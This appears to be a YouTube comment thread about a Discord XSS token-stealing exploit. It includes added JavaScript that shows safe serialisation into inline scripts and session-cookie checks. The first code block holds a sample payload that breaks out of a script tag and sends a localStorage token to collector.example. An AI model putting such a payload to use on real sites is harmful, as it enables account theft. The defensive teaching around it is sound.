Wow... This is a school grade level exploit. Anyone who paid attention to basic website security knows how to prevent this attack. And yet Discord's dev team is so incompetent that it couldn't even prevent something this basic.
@@0.r0 You seem like you're 12 with that spelling. Discord devs work at Discord for money, not a badge? And you have to be over 18 to actually work at Discord.
The crazy thing is that React (which Discord is built with) literally has XSS protection built into it, meaning the developers had to deliberately go out of their way to make this exploit possible.
God, the absolute leveling that this guy does is addicting. This guy feels like one of those parents that would go: "Yeah, school sucks, here's why it sucks-"
Fun fact. Changing your password doesn't always work. I actually once got hacked on Discord, and instantly changed my password the moment I knew what had happened. Before the scammer even had a chance to do it themselves. They still got control of my account. Next level tomfoolery indeed.
In token stealing exploits, you may have to explicitly invalidate all your login sessions, which Discord does allow you to do. Changing passwords doesn't necessarily invalidate all existing login session tokens, though if Discord had any sense they should.
They probably just send an automatic POST request to change the password to the discord server upon receiving the token immediately. Most likely that's why you don't have time to change your password in time
@@Coder_Tavi links get censored by YT (only the poster can see it, nobody else), which might explain why it's showing "2 replies" yet only one shows up
Why don't we create a script that generates tokens and sends them to all known token saving sites? Fill up their databases and have them be less effective
Safer to send junk and not actual tokens. Provided they don't have any checking, it'll still work, and it doesn't carry the risk of accidentally sending a legit token.
I don't know if I should say this, but I literally saw/knew a guy who said he can just token grab people by just giving an invite link, and that was over a year ago. Just how many people have known about it before this vid? Almost scary.
I mean, this link is looking safe. So the only possibility is to not use the internet at all, or don't use services like Discord (whatever this means).
Bro u clearly know nothing. 1. They didn't create an XSS exploit, a person who found the vulnerability created the exploit. 2. Even at Google, Nvidia, Apple etc. XSS and even more dangerous vulnerabilities (like SSRF, or with that RCE) are found (daily), so pls don't just talk shit about Discord when u clearly know nothing about this topic. Look at for example HackerOne and see how many reports are submitted and resolved daily.
@@testuser1235 I ain't your "bro", either way you're still incorrect. Discord developed the application therefore they created the exploitable surface. Perhaps I didn't make that part of my comment clear. I'm not sure why you're white knighting Discord as if they're gonna give you a job for defending them...
Thank you for sharing this important information about the Discord NFT scam link. Your video is helping to educate and protect the community. Keep up the good work in raising awareness about these types of threats
As someone that is still learning web development, this stuff kinda scares me. My knowledge on network security as well as vulnerability detection is not that much yet.
man, the last time I saw such a major and easy XSS vulnerability was XSS in TweetDeck 8 years ago. And that was just a self-retweeting tweet. Such incompetence.
@@0xNe NFTs are used in cars from Alfa Romeo for example. NFTs are for metadata storage, and yeah, a lot of people (mostly scammers) use it to store a link to an image to sell it. But NFTs aren't images or something. This metadata can be anything and can be used for a lot of things (car maintenance info, keys to your car, event tickets, subscriptions, in-game characters or items, login info etc).
@@user-ku9vx6uj4o no shit, where's ur prev comment? And where did I ask what NFTs are? I know what they are, and I, in fact, know that people who bought into NFTs are the dumbest people in existence and most of them lost money, so every time they lose again, it's good news.
@@user-ku9vx6uj4o ye, I don't see yours either, I only see the one from 1 hour ago, others are only in notifs. We will argue some other day, since there's no point if we can't see comments. Have a nice day sir.
I found someone that’s been doing this to get people’s tokens and selling their tokens since the QR code scam, I’ve always thought this was possible but never had a sample to work with like you did, good job man!
Hey, I have been watching for a long while, and I only now just realized that I was never subscribed! Your videos have always been recommended to me :)
I didn't even know what this was called, but as soon as I saw the HTML I knew exactly what was going on. Like, no way did they let you just write HTML in a text description like that.
I'm genuinely surprised this was overlooked, literally no validation checks or encoding on the HTML to make sure that scripts aren't being executed.. it's unsurprising coming from Discord though.
@@zydn Yes, that's true when using JSX. But this exploit was done through the state management software. When someone loads the page it gets exploited before the page even renders out HTML. If it was in the JSX it would have been sanitized.
@@zydn React takes some steps to protect against simple XSS attacks and HTML input vector rendering: displaying script tags, for instance, or other things. The exploit in this case is trickier than you might expect, because it only guards against DOM-based XSS assaults, although XSS comes in a variety of forms. Having said that, data sanitization might have easily avoided this.
I think what's crazy is that people are just now figuring out about this exploit which has actually been around for nearly 2 years now. Also most of the people hijacking accounts are focusing on people with og or "leets" for username and account age so that they can keep it and or sell it. A "leet" would be a username like root#0001 for example.
This is why you don't click links. Even if it's from someone you think you know, try to engage them in a conversation (esp if you haven't heard from them in a minute); if they talk different than normal, you know
@C00L3R Not really. It's like saying Slack is *just* for companies. The only companies on Element in my vicinity is the company of the lads. Also, with Guilded... Roblox Corporation. Enough said. Plus, it's free (libre) and open source, which should be the norm for communications/chat apps.
I actually had my Discord account stolen a while ago - after signing into what I thought was a Discord page. They changed my password (which is how I learned that the account was hijacked). They deleted everything, logged my account into a bunch of random servers, then gave my account back. When I contacted Discord, they told me that it was impossible for my account to have been stolen. After I got my account back (no help from Discord on this front, since they insisted that it wasn't even possible), I asked them if they could tell me where my account was accessed from. I never got a reply back from them. I found out on my own, using Discord's own tools, what countries (yes, more than one) my account had been accessed from between the time it was stolen and the time it was "returned".
brainfart: could people theoretically spam the blueh and/or hawkemedia links with fake/random tokens via scripts to throw some sand in their gearbox? obviously not all from the same IP so it's not as easy for them to filter out. they'd have to figure out if the tokens they collected are actually valid, and i guess would be kinda pissed if 99% aren't lol 🤔
This shows how little testing they have. If they'd had more testing, especially for such a simple webpage, this would have never made it to live. XSS is very simple to prevent and, as many people have posted many times before, it is very simple to escape a user's input. Apparently Discord doesn't know/follow the "never trust user input" rule. Also, with Discord being as big as it is, you'd think they'd do vulnerability testing that would have told them about this problem long before it got out of dev.
This happened to me. I got offered to be paid to "test" a service or something similar and be invited to a server. I just simply ignored those DMs. They were persistent and would try one or two more times, I still never clicked on them.
Fantastic video to inform us all about it, but to be honest, if you just stick to the rule of never clicking on any links before asking around, that is the safest way to go. Do not let your curiosity or greed get the better of you, as those are usually how you fall for any scams. Always ask yourself what could happen, or simply why you have to click on something someone sent you in DM who you have never spoken to before. Always have a certain level of distrust, as come on, this is the internet; unless you know them personally IRL you should always have that certain level of awareness, as anything could happen, such as even your best friend on the internet for years could turn on you for personal benefits.
It is possible to do a lot of input sanitization, CORS policy changes and CSP changes to circumvent a lot of XSS, but in the end you probably won't get everything. Hackers will reverse a site and try to find a bypass to the filter you set in place. It isn't necessarily Discord's fault because it took hackers this long to discover it. It just goes to show that nothing you do as a security researcher and engineer will truly patch a vulnerability fully, but instead just makes it harder for a hacker to exploit it. Discord does have a bug bounty, but if crypto scams will yield more money than the reward money from the bug bounty, it makes more sense for hackers to exploit it rather than responsibly disclosing it.
@@JaivianDean Even then, reflected XSS is one of the least serious types of XSS. If it were to have been stored XSS, we would have had a huge problem (worse than this one). This still required a little social engineering and user interaction to pull off. Though that kinda makes sense, they should have probably checked for something like that before they pushed an update.
Like I said, the only way to stop this, is to deal with the hackers one on one. Trying to patch up a broken wall, to hide from them, is only delaying the inevitable, because they will ALWAYS find you. Sadly, everyone chooses to literally allow them to do these things.
Stealing a Discord token is incredibly bad. If you lose the token and the recipient has any sort of scripting set up, you can expect to have the entire account stolen inside of 30 seconds. I'd fallen for a phish where I was asked to test a game distributed over Itch. It stole my Discord token from my Discord desktop client, logged me out, and closed the client. And despite having 2FA on my account, I was unable to log back in again, as the token thief managed to strip 2FA AND change the password AND change the email address on it. Without any sort of request for 2FA tokens from my phone or passwords. I'd asked Discord support over Twitter for assistance, and they'd reverted the email address back to mine... but presumably the token never got reset or the token stealer was still running on my machine, because it was stolen and yanked away from me yet again. And yes, I was a paying Nitro user with saved payment information. Thankfully, because I paid via PayPal, I was able to tell PayPal to never send any money toward Discord and saved myself ~US$150 of fraudulent purchases.
I can't believe that discord forgot about it! It's legit on the OWASP top 10 web app vulnerabilities. A lot of these big companies forget about web app security 101 and it's sad.
They outsource things like frontend to their diversity-hire tokens or to overseas workers entirely. Many major companies do it. It's why websites like RU-vid and Discord are getting progressively worse and worse from an interface perspective
I see everyone hating on Discord. I am a bug bounty hunter, and we gotta understand that all of us are humans, everyone makes mistakes, way bigger companies are getting hacked daily with way stupider vulnerabilities, and you gotta remember there are millions of places where you have to check for vulnerabilities. Of course it sounds stupid that it had such a stupid vulnerability, because it was found and sounds like "holy shit, everybody could find it"; it's actually not working like that 😂
With modern JS frameworks the threat of XSS is lessened. React makes it obvious when you might have issues by making you type out "dangerouslySetInnerHTML" when you're doing something that is likely dumb. In React if you pass a "" to anything else it will be interpreted as text. This makes developers less aware of threats because XSS hasn't been a concern to them, until there's SSR and the browser is no longer told to interpret "" as text but it looks like it should be an element. It's super simple to avoid, but at the same time it's easy for developers to forget that it's a concern.
It's stupid that Discord did that, but it is also astounding that Redux put the vulnerable code on their website, with only a comment in the snippet saying "hey check this link for security issues", instead of including the two function calls that make it safe. And then I wonder why Discord server-side renders/templates it in there in the first place; JS can access the query param itself... Truthfully, as a developer I have to say that unfortunately I have had many less than competent colleagues, and combined with pressure and negligence from management that has led to very similar and worse issues a number of times. These issues don't come out of nowhere.
LOL, how ironic that hackers are stealing Discord tokens, yet they couldn't be bothered to update their version of nginx (which is old and very insecure).
Sometimes, it's the implementation of XSS prevention which is vulnerable. There was evidence of existing XSS prevention in the audit that was made. Don't flame them too hard.
i feel so bad for the people who had their accounts stolen but holy fuck is that funny lmao. It's such an easy thing to fix and I don't know how it's ever a thing in 2022
What one could do in case of these dead ends mentioned in the video, it is always possible to look where the servers are hosted and what they are doing with them. ping, traceroute and nmap are your friends.
How the hell does a junior developer like myself understand how to prevent xss better than discord. This honestly screams of gross negligence and laziness
Even if you prevented it, sometimes XSS prevention itself is a flaw; there are nearly infinite ways an input can be sanitized. Even in a good system, it's a matter of time before it's bound to happen.
ok so a bunch of people are saying stuff about React or DOMPurify, but what it looks like actually happened is they literally inserted the user-generated text INSIDE a script element before running it (either server-side or with .unsafeHTML). This is because the first part of the visible script we see is an end-script tag, so the injected script first needs to end the real Discord script element (to avoid syntax errors), start its own with the token stealing, and then end its and start a new one for the rest of Discord's script. This is literally the MOST OBVIOUS XSS I've EVER SEEN, it's literally fucking inserting text _from the user_ IN THE MIDDLE OF YOUR JAVASCRIPT. literally wtf discord
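The point made in the last few comments (React's JSX escaping not applying, the Redux preloaded-state snippet, and a payload that opens with `</script>`) comes down to one thing: data interpolated into an inline script element is in a JavaScript context, not an HTML-text context, so neither JSX nor HTML entity encoding protects it. The block below is an added example written for this page; it is not Discord's code and not the Redux documentation's snippet. The query-parameter payload, the collector URL, the `localStorage` key and the `window.__PRELOADED_STATE__` name are constructed for illustration.

```javascript
// Added example (not Discord's code, not Redux's docs): embedding untrusted data in an
// inline <script>, the vulnerable way and the hardened way, plus a check for the break.

// Constructed attacker-controlled value, in the shape the thread describes: close the
// host script, run attacker JS, reopen a script so the rest of the page still parses.
// The collector URL and localStorage key are hypothetical.
const ATTACKER_QUERY_PARAM =
  '</script><script>fetch("https://collector.example/?t=" + localStorage.getItem("token"))</script><script>';

// Vulnerable pattern: JSON.stringify straight into a script element. JSON.stringify
// escapes quotes and control characters but NOT "<", so "</script>" survives intact
// and the HTML parser ends the script element right there.
function renderPreloadedStateUnsafe(state) {
  return `<script>window.__PRELOADED_STATE__ = ${JSON.stringify(state)}</script>`;
}

// Hardened pattern: serialise, then escape the characters that can change context
// inside a script block. "<" becomes the JS string escape \u003c, so the HTML parser
// never sees "</script>" while the JS parser still decodes it back to "<".
// U+2028/U+2029 are legal in JSON strings but were line terminators in older JS engines.
function serializeForInlineScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderPreloadedStateSafe(state) {
  return `<script>window.__PRELOADED_STATE__ = ${serializeForInlineScript(state)}</script>`;
}

// Crude reviewer check over rendered HTML: a template that intends exactly one inline
// script but renders more than one opener has a context break.
function countScriptTags(html) {
  const opens = (html.match(/<script\b/gi) || []).length;
  const closes = (html.match(/<\/script\s*>/gi) || []).length;
  return { opens, closes };
}

// The escaped literal must still evaluate to the original value, because the browser's
// JS parser decodes \u003c inside string literals. Evaluated here the way a browser would.
function roundTrips(value) {
  const html = renderPreloadedStateSafe(value);
  const prefix = '<script>window.__PRELOADED_STATE__ = ';
  const literal = html.slice(prefix.length, -'</script>'.length);
  const parsed = new Function(`return ${literal};`)();
  return JSON.stringify(parsed) === JSON.stringify(value);
}

const state = { invite: { description: ATTACKER_QUERY_PARAM } };
console.log(countScriptTags(renderPreloadedStateUnsafe(state))); // { opens: 3, closes: 3 }
console.log(countScriptTags(renderPreloadedStateSafe(state)));   // { opens: 1, closes: 1 }
console.log(roundTrips(state));                                  // true
```

Two caveats. HTML-entity encoding (`&lt;`) is the wrong fix here: the content of a script element is raw text, the browser does not decode entities inside it, and the JSON would carry a literal `&lt;`. And the `\u003c` escape only protects the string-literal context; if the same data were interpolated into the script as bare code rather than inside a JSON/JS string, no character escape would make it safe.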
I was around the hacking space when this vulnerability was found. My friend tested it on me and we thought it was a cool little gimmick but nothing worth using against anyone except enemies. That was 6 years ago I believe, if it’s really been this long and they haven’t patched it, that’s extremely sad. Honestly a low level exploit as well.
Your discord token will automatically change within 6-8 hours I think or maybe 12. It doesn't stay the same forever. They can send automated requests using that. But they can't change your password or access the full discord account. Unless they know the Server ID, Channel ID in which they want to send the message in. So they would have that info probably of only one server in which you were with the guy that sent you the link.
Two wrongs in this message. Firstly, the Discord token does not expire until you change your password or change two-factor authentication settings. Secondly, you are able to access the full account, it's very simple to log into an account using the token. Don't spread false security tips, it helps no one
I swear my account once got hacked, and it did something worse than take my money. It blocked all my friends, while sending them a false hate message! I'm better now, and yes, it was the QR code thing.
It probably got in their DB, and then the page just loaded the values from their DB, which they did not sanitize properly. Kinda makes you wonder if the server is even verifying input properly before posting data in the database.. SQL Injections..
This might be a really stupid question, but why do Discord tokens exist? Most scamming attempts seem to try and get your token. What do we need it for? Can't we just always have our account bound with username, password and 2FA?
A token is a long string of text stored in your browser that it sends to the server to let it know who you are, instead of just sending your username and password every time, as that would require storing your password in plaintext somewhere or making a brand new system, which is unnecessary. Without a token a server couldn't verify who you are and would require you to log in every single time you want to do literally anything.
It wouldn't have been a thing in this day and age if we'd gotten rid of the hackers a long time ago. But we don't. We just keep gluing a cracked wall together with raisins and mud hoping that someone can't just bust it down and get to you.
This is why sensitive information is better saved in cookies instead of in session. This info isn't accessible by scripts if you are using HTTP-only cookies
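The last three comments describe what a session token is for and why keeping it in an HttpOnly cookie rather than in script-readable storage limits what an XSS payload can exfiltrate. The block below is an added example written for this page, not Discord's code: a small `Set-Cookie` parser and the checks a reviewer applies to a session cookie. The header strings are constructed samples, not captured from any real service.

```javascript
// Added example, not Discord's code: what "HttpOnly cookie" means concretely, as a
// Set-Cookie parser plus the attribute checks a reviewer applies to a session cookie.

// Constructed sample headers (not captured from any real service).
const SAMPLE_SET_COOKIE = {
  // Token readable by any script on the page via document.cookie, also sent over plain HTTP
  weak: 'session=abc123; Path=/',
  // Baseline for a session cookie: script cannot read it, HTTPS only, and not attached
  // to cross-site requests initiated by other origins
  hardened: 'session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax',
  // __Host- prefix: browsers accept it only with Secure, Path=/ and no Domain attribute,
  // so a sibling subdomain cannot plant or overwrite it
  prefixed: '__Host-session=abc123; Path=/; Secure; HttpOnly; SameSite=Strict',
  // Prefix used incorrectly: the Domain attribute makes the browser drop the cookie
  badPrefix: '__Host-session=abc123; Domain=example.com; Path=/; Secure; HttpOnly',
};

// Parse one Set-Cookie header into name, value and a lower-cased attribute map.
// Flag attributes (Secure, HttpOnly) are stored as true; valued ones keep their string.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';').map((s) => s.trim()).filter(Boolean);
  const eq = pair.indexOf('=');
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs: {} };
  for (const attr of rest) {
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).trim().toLowerCase();
    cookie.attrs[key] = i === -1 ? true : attr.slice(i + 1).trim();
  }
  return cookie;
}

// Return a list of findings for a cookie that carries a session token;
// an empty list means the header passes these checks.
function auditSessionCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (c.attrs.httponly !== true) {
    findings.push('missing HttpOnly: injected script can read the token via document.cookie');
  }
  if (c.attrs.secure !== true) {
    findings.push('missing Secure: the cookie is also sent over plaintext HTTP');
  }
  const sameSite = String(c.attrs.samesite || '').toLowerCase();
  if (sameSite !== 'lax' && sameSite !== 'strict') {
    findings.push('SameSite not Lax or Strict: cross-site behaviour left to browser defaults');
  }
  if (c.name.startsWith('__Host-')) {
    // Cookie-prefix rules: Secure, Path=/ and no Domain, or the browser rejects it.
    if (c.attrs.secure !== true || c.attrs.path !== '/' || 'domain' in c.attrs) {
      findings.push('__Host- prefix without Secure + Path=/ + no Domain: browser will reject the cookie');
    }
  }
  return findings;
}

for (const [label, header] of Object.entries(SAMPLE_SET_COOKIE)) {
  console.log(label, auditSessionCookie(header));
}
```

The caveat that belongs with the comment above: HttpOnly stops an XSS payload from reading the token and shipping it off-site, which is what the token stealers in this thread do. It does not stop the same payload from making authenticated requests from inside the victim's page, because the browser attaches the cookie to those requests automatically. It narrows the blast radius of an XSS; it does not make one harmless.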